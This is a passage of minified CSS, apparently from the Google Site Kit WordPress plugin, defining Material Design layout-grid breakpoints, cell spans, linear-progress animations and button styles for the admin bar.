.mdc-layout-grid{box-sizing:border-box;margin:0 auto;padding:16px;padding:var(--mdc-layout-grid-margin-phone, 16px)}}@media(min-width: 961px){.mdc-layout-grid__inner,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__inner,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__inner{display:flex;flex-flow:row wrap;align-items:stretch;margin:-12px;margin:calc(var(--mdc-layout-grid-gutter-desktop, 24px) / 2 * -1)}@supports(display: grid){.mdc-layout-grid__inner,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__inner,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__inner{display:grid;margin:0;grid-gap:24px;grid-gap:var(--mdc-layout-grid-gutter-desktop, 24px);grid-template-columns:repeat(12, minmax(0, 1fr))}}}@media(min-width: 601px)and (max-width: 960px){.mdc-layout-grid__inner,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__inner,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__inner{display:flex;flex-flow:row wrap;align-items:stretch;margin:-8px;margin:calc(var(--mdc-layout-grid-gutter-tablet, 16px) / 2 * -1)}@supports(display: grid){.mdc-layout-grid__inner,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__inner,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__inner{display:grid;margin:0;grid-gap:16px;grid-gap:var(--mdc-layout-grid-gutter-tablet, 16px);grid-template-columns:repeat(8, minmax(0, 1fr))}}}@media(max-width: 600px){.mdc-layout-grid__inner,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__inner,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__inner{display:flex;flex-flow:row wrap;align-items:stretch;margin:-8px;margin:calc(var(--mdc-layout-grid-gutter-phone, 16px) / 2 * -1)}@supports(display: grid){.mdc-layout-grid__inner,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__inner,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__inner{display:grid;margin:0;grid-gap:16px;grid-gap:var(--mdc-layout-grid-gutter-phone, 16px);grid-template-columns:repeat(4, minmax(0, 1fr))}}}@media(min-width: 961px){.mdc-layout-grid__cell,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell{width:calc(33.3333333333% - 24px);width:calc(33.3333333333% - var(--mdc-layout-grid-gutter-desktop, 24px));box-sizing:border-box;margin:12px;margin:calc(var(--mdc-layout-grid-gutter-desktop, 24px) / 2)}@supports(display: grid){.mdc-layout-grid__cell,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell{width:auto;grid-column-end:span 4}}@supports(display: grid){.mdc-layout-grid__cell,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell{margin:0}}.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-desktop{width:calc(8.3333333333% - 24px);width:calc(8.3333333333% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-desktop{width:auto;grid-column-end:span 1}}.mdc-layout-grid__cell--span-2,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-desktop{width:calc(16.6666666667% - 24px);width:calc(16.6666666667% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-2,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-desktop{width:auto;grid-column-end:span 2}}.mdc-layout-grid__cell--span-3,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-desktop,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-3-desktop{width:calc(25% - 24px);width:calc(25% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-3,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-desktop,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-3-desktop{width:auto;grid-column-end:span 3}}.mdc-layout-grid__cell--span-4,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-desktop{width:calc(33.3333333333% - 24px);width:calc(33.3333333333% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-4,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-desktop{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-desktop{width:calc(41.6666666667% - 24px);width:calc(41.6666666667% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-desktop{width:auto;grid-column-end:span 5}}.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-desktop,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-6-desktop{width:calc(50% - 24px);width:calc(50% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-desktop,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-6-desktop{width:auto;grid-column-end:span 6}}.mdc-layout-grid__cell--span-7,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-desktop,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-7-desktop{width:calc(58.3333333333% - 24px);width:calc(58.3333333333% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-7,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-desktop,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-7-desktop{width:auto;grid-column-end:span 7}}.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-desktop{width:calc(66.6666666667% - 24px);width:calc(66.6666666667% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-desktop{width:auto;grid-column-end:span 8}}.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-desktop{width:calc(75% - 24px);width:calc(75% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-desktop{width:auto;grid-column-end:span 9}}.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-desktop{width:calc(83.3333333333% - 24px);width:calc(83.3333333333% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-desktop{width:auto;grid-column-end:span 10}}.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-desktop{width:calc(91.6666666667% - 24px);width:calc(91.6666666667% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-desktop{width:auto;grid-column-end:span 11}}.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-desktop{width:calc(100% - 24px);width:calc(100% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-desktop{width:auto;grid-column-end:span 12}}}@media(min-width: 601px)and (max-width: 960px){.mdc-layout-grid__cell,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell{width:calc(50% - 16px);width:calc(50% - var(--mdc-layout-grid-gutter-tablet, 16px));box-sizing:border-box;margin:8px;margin:calc(var(--mdc-layout-grid-gutter-tablet, 16px) / 2)}@supports(display: grid){.mdc-layout-grid__cell,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell{width:auto;grid-column-end:span 4}}@supports(display: grid){.mdc-layout-grid__cell,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell{margin:0}}.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-tablet{width:calc(12.5% - 16px);width:calc(12.5% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-tablet{width:auto;grid-column-end:span 1}}.mdc-layout-grid__cell--span-2,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-tablet,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-2-tablet{width:calc(25% - 16px);width:calc(25% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-2,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-tablet,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-2-tablet{width:auto;grid-column-end:span 2}}.mdc-layout-grid__cell--span-3,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-tablet{width:calc(37.5% - 16px);width:calc(37.5% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-3,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-tablet{width:auto;grid-column-end:span 3}}.mdc-layout-grid__cell--span-4,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-tablet,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-4-tablet{width:calc(50% - 16px);width:calc(50% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-4,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-tablet,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-4-tablet{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-tablet{width:calc(62.5% - 16px);width:calc(62.5% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-tablet{width:auto;grid-column-end:span 5}}.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-tablet{width:calc(75% - 16px);width:calc(75% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-tablet{width:auto;grid-column-end:span 6}}.mdc-layout-grid__cell--span-7,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-tablet{width:calc(87.5% - 16px);width:calc(87.5% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-7,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-tablet{width:auto;grid-column-end:span 7}}.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-tablet,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-8-tablet{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-tablet,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-8-tablet{width:auto;grid-column-end:span 8}}.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-tablet{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-tablet{width:auto;grid-column-end:span 8}}.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-tablet{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-tablet{width:auto;grid-column-end:span 8}}.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-tablet{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-tablet{width:auto;grid-column-end:span 8}}.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-tablet,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-tablet,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell{width:auto;grid-column-end:span 8}}}@media(max-width: 600px){.mdc-layout-grid__cell,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px));box-sizing:border-box;margin:8px;margin:calc(var(--mdc-layout-grid-gutter-phone, 16px) / 2)}@supports(display: grid){.mdc-layout-grid__cell,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell{width:auto;grid-column-end:span 4}}@supports(display: grid){.mdc-layout-grid__cell,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid__cell,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell{margin:0}}.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-phone{width:calc(25% - 16px);width:calc(25% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-phone{width:auto;grid-column-end:span 1}}.mdc-layout-grid__cell--span-2,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-phone{width:calc(50% - 16px);width:calc(50% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-2,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-phone{width:auto;grid-column-end:span 2}}.mdc-layout-grid__cell--span-3,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-phone{width:calc(75% - 16px);width:calc(75% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-3,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-phone{width:auto;grid-column-end:span 3}}.mdc-layout-grid__cell--span-4,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-4,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-7,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-7,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-phone{width:auto;grid-column-end:span 4}}}.mdc-layout-grid__cell--order-1{order:1}.mdc-layout-grid__cell--order-2{order:2}.mdc-layout-grid__cell--order-3{order:3}.mdc-layout-grid__cell--order-4{order:4}.mdc-layout-grid__cell--order-5{order:5}.mdc-layout-grid__cell--order-6{order:6}.mdc-layout-grid__cell--order-7{order:7}.mdc-layout-grid__cell--order-8{order:8}.mdc-layout-grid__cell--order-9{order:9}.mdc-layout-grid__cell--order-10{order:10}.mdc-layout-grid__cell--order-11{order:11}.mdc-layout-grid__cell--order-12{order:12}.mdc-layout-grid__cell--align-top{align-self:flex-start}@supports(display: grid){.mdc-layout-grid__cell--align-top{align-self:start}}.mdc-layout-grid__cell--align-middle{align-self:center}.mdc-layout-grid__cell--align-bottom{align-self:flex-end}@supports(display: grid){.mdc-layout-grid__cell--align-bottom{align-self:end}}@media(min-width: 961px){.mdc-layout-grid--fixed-column-width{width:1176px;width:calc( var(--mdc-layout-grid-column-width-desktop, 72px) * 12 + var(--mdc-layout-grid-gutter-desktop, 24px) * 11 + var(--mdc-layout-grid-margin-desktop, 24px) * 2 )}}@media(min-width: 601px)and (max-width: 960px){.mdc-layout-grid--fixed-column-width{width:720px;width:calc( var(--mdc-layout-grid-column-width-tablet, 72px) * 8 + var(--mdc-layout-grid-gutter-tablet, 16px) * 7 + var(--mdc-layout-grid-margin-tablet, 16px) * 2 )}}@media(max-width: 600px){.mdc-layout-grid--fixed-column-width{width:368px;width:calc( var(--mdc-layout-grid-column-width-phone, 72px) * 4 + var(--mdc-layout-grid-gutter-phone, 16px) * 3 + var(--mdc-layout-grid-margin-phone, 16px) * 2 )}}.mdc-layout-grid--align-left{margin-right:auto;margin-left:0}.mdc-layout-grid--align-right{margin-right:0;margin-left:auto}@keyframes primary-indeterminate-translate{0%{transform:translateX(0)}20%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(0)}59.15%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(83.67142%)}100%{transform:translateX(200.611057%)}}@keyframes primary-indeterminate-scale{0%{transform:scaleX(0.08)}36.65%{animation-timing-function:cubic-bezier(0.334731, 0.12482, 0.785844, 1);transform:scaleX(0.08)}69.15%{animation-timing-function:cubic-bezier(0.06, 0.11, 0.6, 1);transform:scaleX(0.661479)}100%{transform:scaleX(0.08)}}@keyframes secondary-indeterminate-translate{0%{animation-timing-function:cubic-bezier(0.15, 0, 0.515058, 0.409685);transform:translateX(0)}25%{animation-timing-function:cubic-bezier(0.31033, 0.284058, 0.8, 0.733712);transform:translateX(37.651913%)}48.35%{animation-timing-function:cubic-bezier(0.4, 0.627035, 0.6, 0.902026);transform:translateX(84.386165%)}100%{transform:translateX(160.277782%)}}@keyframes secondary-indeterminate-scale{0%{animation-timing-function:cubic-bezier(0.205028, 0.057051, 0.57661, 0.453971);transform:scaleX(0.08)}19.15%{animation-timing-function:cubic-bezier(0.152313, 0.196432, 0.648374, 1.004315);transform:scaleX(0.457104)}44.15%{animation-timing-function:cubic-bezier(0.257759, -0.003163, 0.211762, 1.38179);transform:scaleX(0.72796)}100%{transform:scaleX(0.08)}}@keyframes buffering{to{transform:translateX(-10px)}}@keyframes primary-indeterminate-translate-reverse{0%{transform:translateX(0)}20%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(0)}59.15%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(-83.67142%)}100%{transform:translateX(-200.611057%)}}@keyframes secondary-indeterminate-translate-reverse{0%{animation-timing-function:cubic-bezier(0.15, 0, 0.515058, 0.409685);transform:translateX(0)}25%{animation-timing-function:cubic-bezier(0.31033, 0.284058, 0.8, 0.733712);transform:translateX(-37.651913%)}48.35%{animation-timing-function:cubic-bezier(0.4, 0.627035, 0.6, 0.902026);transform:translateX(-84.386165%)}100%{transform:translateX(-160.277782%)}}@keyframes buffering-reverse{to{transform:translateX(10px)}}.mdc-linear-progress,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress{position:relative;width:100%;height:4px;transform:translateZ(0);transition:opacity 250ms 0ms cubic-bezier(0.4, 0, 0.6, 1);overflow:hidden}.mdc-linear-progress__bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress__bar{position:absolute;width:100%;height:100%;animation:none;transform-origin:top left;transition:transform 250ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-linear-progress__bar-inner,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress__bar-inner{display:inline-block;position:absolute;width:100%;height:100%;animation:none}.mdc-linear-progress__buffering-dots,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress__buffering-dots{position:absolute;width:100%;height:100%;animation:buffering 250ms infinite linear;background-repeat:repeat-x;background-size:10px 4px}.mdc-linear-progress__buffer,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress__buffer{position:absolute;width:100%;height:100%;transform-origin:top left;transition:transform 250ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-linear-progress__primary-bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress__primary-bar{transform:scaleX(0)}.mdc-linear-progress__secondary-bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress__secondary-bar{visibility:hidden}.mdc-linear-progress--indeterminate .mdc-linear-progress__bar,.mdc-linear-progress--indeterminate #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--indeterminate .mdc-linear-progress__bar{transition:none}.mdc-linear-progress--indeterminate .mdc-linear-progress__primary-bar,.mdc-linear-progress--indeterminate #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__primary-bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--indeterminate .mdc-linear-progress__primary-bar{left:-145.166611%;animation:primary-indeterminate-translate 2s infinite linear}.mdc-linear-progress--indeterminate .mdc-linear-progress__primary-bar>.mdc-linear-progress__bar-inner,.mdc-linear-progress--indeterminate #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__primary-bar>.mdc-linear-progress__bar-inner,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--indeterminate .mdc-linear-progress__primary-bar>.mdc-linear-progress__bar-inner{animation:primary-indeterminate-scale 2s infinite linear}.mdc-linear-progress--indeterminate .mdc-linear-progress__secondary-bar,.mdc-linear-progress--indeterminate #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__secondary-bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--indeterminate .mdc-linear-progress__secondary-bar{left:-54.888891%;animation:secondary-indeterminate-translate 2s infinite linear;visibility:visible}.mdc-linear-progress--indeterminate .mdc-linear-progress__secondary-bar>.mdc-linear-progress__bar-inner,.mdc-linear-progress--indeterminate #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__secondary-bar>.mdc-linear-progress__bar-inner,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--indeterminate .mdc-linear-progress__secondary-bar>.mdc-linear-progress__bar-inner{animation:secondary-indeterminate-scale 2s infinite linear}.mdc-linear-progress--reversed .mdc-linear-progress__bar,.mdc-linear-progress--reversed #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--reversed .mdc-linear-progress__bar,.mdc-linear-progress--reversed .mdc-linear-progress__buffer,.mdc-linear-progress--reversed #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__buffer,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--reversed .mdc-linear-progress__buffer{right:0;transform-origin:center right}.mdc-linear-progress--reversed .mdc-linear-progress__primary-bar,.mdc-linear-progress--reversed #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__primary-bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--reversed .mdc-linear-progress__primary-bar{animation-name:primary-indeterminate-translate-reverse}.mdc-linear-progress--reversed .mdc-linear-progress__secondary-bar,.mdc-linear-progress--reversed #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__secondary-bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--reversed .mdc-linear-progress__secondary-bar{animation-name:secondary-indeterminate-translate-reverse}.mdc-linear-progress--reversed .mdc-linear-progress__buffering-dots,.mdc-linear-progress--reversed #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__buffering-dots,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--reversed .mdc-linear-progress__buffering-dots{animation:buffering-reverse 250ms infinite linear}.mdc-linear-progress--closed{opacity:0}.mdc-linear-progress__bar-inner,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress__bar-inner{background-color:#3c7251;background-color:var(--mdc-theme-primary, #3c7251)}.mdc-linear-progress__buffering-dots,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress__buffering-dots{background-image:url("data:image/svg+xml,%3Csvg version=%271.1%27 xmlns=%27http://www.w3.org/2000/svg%27 xmlns:xlink=%27http://www.w3.org/1999/xlink%27 x=%270px%27 y=%270px%27 enable-background=%27new 0 0 5 2%27 xml:space=%27preserve%27 viewBox=%270 0 5 2%27 preserveAspectRatio=%27none slice%27%3E%3Ccircle cx=%271%27 cy=%271%27 r=%271%27 fill=%27%23e6e6e6%27/%3E%3C/svg%3E")}.mdc-linear-progress__buffer,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress__buffer{background-color:#e6e6e6}.mdc-linear-progress--indeterminate.mdc-linear-progress--reversed .mdc-linear-progress__primary-bar,.mdc-linear-progress--indeterminate.mdc-linear-progress--reversed #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__primary-bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--indeterminate.mdc-linear-progress--reversed .mdc-linear-progress__primary-bar{right:-145.166611%;left:auto}.mdc-linear-progress--indeterminate.mdc-linear-progress--reversed .mdc-linear-progress__secondary-bar,.mdc-linear-progress--indeterminate.mdc-linear-progress--reversed #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__secondary-bar,#wpadminbar .googlesitekit-adminbar .mdc-linear-progress--indeterminate.mdc-linear-progress--reversed .mdc-linear-progress__secondary-bar{right:-54.888891%;left:auto}.googlesitekit-plugin .mdc-button,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button{box-shadow:none;font-weight:500;text-transform:none}.googlesitekit-plugin .mdc-button:not(:disabled),#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button:not(:disabled){color:#3c7251}@media(max-width: 960px){.googlesitekit-plugin .mdc-button,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button{min-width:auto}}.googlesitekit-plugin .mdc-button .mdc-button__icon--image,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button .mdc-button__icon--image{border-radius:50%;display:block;height:18px;width:18px}.googlesitekit-plugin .mdc-button .mdc-button__trailing-icon,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button .mdc-button__trailing-icon{margin-left:8px}.googlesitekit-plugin .mdc-button--raised,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised{border-radius:100px;box-shadow:none;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;height:auto;letter-spacing:normal;min-height:40px;padding-bottom:8px;padding-top:8px;text-align:center}.googlesitekit-plugin 